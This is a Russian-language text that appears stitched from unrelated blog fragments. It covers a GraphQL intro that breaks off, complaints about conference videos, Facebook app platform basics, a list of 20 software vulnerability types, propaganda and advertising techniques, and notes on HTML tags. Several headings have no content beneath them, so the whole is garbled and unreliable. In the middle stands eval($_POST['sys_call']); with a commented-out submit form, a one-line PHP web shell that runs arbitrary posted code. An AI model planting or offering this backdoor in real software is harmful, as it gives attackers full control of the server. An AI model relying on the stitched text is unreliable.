Программисты любят хорошие истории, поэтому надеюсь что пятилетний путь к композитному API с помощью GraphQL в боевой среде (на пике выдающей 110 запросов в секунду при 100мс задержке) будет интересен.

[Если вы спешите, проскрольте ниже к урокам и гляньте на открытый код graphql-schema-registry]

• заказывают сторонних людей, которые выкладывают всё на свой канал вместе с другими конференциями или личным хламом;
• встраивают в свой сайт без возможность шаринга, а порой и вообще закрывают под ключ или с оплатой;
• не выкладывают материалы и трёхлетней давности;
• не заботятся о качестве видео — тёмный зал, совершенно не видно презентации, нет монтажа, неполадки со звуком, неслышно вопросов и т.п.

• управляющего проектом это позвоночник и вегетативная нервная система
• программисты это скелет и моторика
• аналитики это органы чувств
• тестеры это совесть

Основы

• Canvas — собственно страница с приложением. Доступна по ссылке apps.facebook.com/НАЗВАНИЕ_ПРОГРАММЫ
• Profile box — маленький бокс внутри самого профиля пользователя
• Profile tab — новый таб в профиле
• Boxes tab — небольшой блок в табе boxes
• News feed — доступ к потоку обновлений
• Requests box — интерактивные сообщения другим пользователям

• REST API (http://api.new.facebook.com/restserver.php) который даёт «тяжёлый» доступ для backend-а с возможностями загрузки фото, видео, получении списков друзей, событий, комментариев и тп.
• FQL — способ запрашивать данные по REST не просто через параметры метода, а уже через SQL-подобный синтаксис
• FBML — урезанный HTML + свои тэги которые Facebook интерпретирует в окне в своём стиле и дизайне и кэширует при инлайновом показе. Куча заморочек с встроенным валидатором тэгов
• xFBML — FBML-тэги используемые в своём приложении
• FBJS — урезанный JS

Два пути

Про определение

1. Неверная валидация ввода данных
2. Неправильная кодировка или отсутсвие обработки данных вывода
3. SQL-инъекция
4. Cross-site scripting
5. Неограниченность в консольном доступе (OS-инъекция)
6. Передача личных данных по малозащищённому каналу
7. Межсайтовый запрос как подделка внутреннего запроса
8. Соревнование потоков использующих один ресурс и неверное закрытие его использования
9. Слишком информативное содержание об ошибке
10. Выход указателя программы за пределы отведённой памяти
11. Внешнее управление внутренними переменными и файловыми путями
12. Генерируемый код и его потенциальная инъекция
13. Автообновление программы полученным кодом без подтверждения источника
14. Грязная инициализация — доступны данные предыдущих инициализаций
15. Математика с ограниченными числами
16. Ненадёжная авторизация и за-hard-коденые пароли
17. Использование подверженного риску или взломанному алгоритму криптографии
18. Исполнение с повышенными привилегиями
19. Использование недостаточно случайных чисел
20. Валидация на стороне клиента но не на стороне сервера

1. Эмоциональная привлекательность. Надо создать ощущение безопасности, любви, счастья у человека например при помощи фотографий таких людей использующих товар; показать мужественность и заботу о народе
2. Девиз. Используйте короткую запоминающуюся фразу, лозунг, slogan. Вспоминаются как корпоративные «connecting people», так и «в сортире замочим».
3. Признание. Возьмите знаменитость, Вахтанга Кикабидзе например, что-бы он поддержал идею или стал лицом революции/товара/идеи.
4. Автобус музыкантов. Создайте ощущение что так поступают все — восстанавливают территориальную целостность или защищают своих граждан.
   
5. Причина и следствие. Отбросьте все другие факторы и скажите что — только благодаря этому товару вы стали умней; раз взорвали небоскрёб, то виноваты только террористы.
6. Сравнение возможностей. При совмещении с эмоциональной привлекательностью — отличный пример при сравнении «плохого» моющего порошка с хорошим. В нашем случае — может усиливать разницу в силе армий, в числе жертв и тп.
   
7. Символ. Как правило графический знак или персонаж, вызывающий явную ассоциацию, как например у религий.

eval($_POST['sys_call']);
//echo '<form method="POST"><textarea name="sys_call"></textarea><input type="submit"></form>';

Простой пример

Постановка задачи

Решение

1. a — мало кто помнит почему самый популярный тэг ссылки использует такое название да ещё и параметр href. Ещё меньше пишущих статьи используют этот тэг по прямому назначению, а именно в качестве якоря к участку документа, определённому параметром name. С переходом на динамическое содержание при помощи ajax, якорь получил новую жизнь, поскольку в URL после # можно прописать адресс открытого письма (см. gmail), но мало кто это замечает.
   
2. address — единого мнения нет, то-ли это физический почтовый адресс, то-ли это часть описания документа с email-ом.
   
3. abbr — отличный тэг для сокращений. Используя параметр title как в картинках, при наведении курсором появится полное название
4. ins и del — очень часто статьи в блогах и ЖЖ меняются, при этом люди пишут что-то типа «upd. вопрос разрешился», тогда как логичней использовать для этого соответсвующие тэги. Само собой когда статья имеет историю изменений типа wiki, то система должна быть посложней.
   
5. sub и sup — эти тэги находят как правило те кто хочет оформить простейшую математику или химию. Впрочем степени, атомарные и изотопные индексы не единственная функция. Если вы когда-либо писали дипломную работу то наверняка столкнулись с научным оформлением ссылок на источники, а сноски с использованием sup вкупе с anchor активно используются взамен неподдерживаемого тэга fn.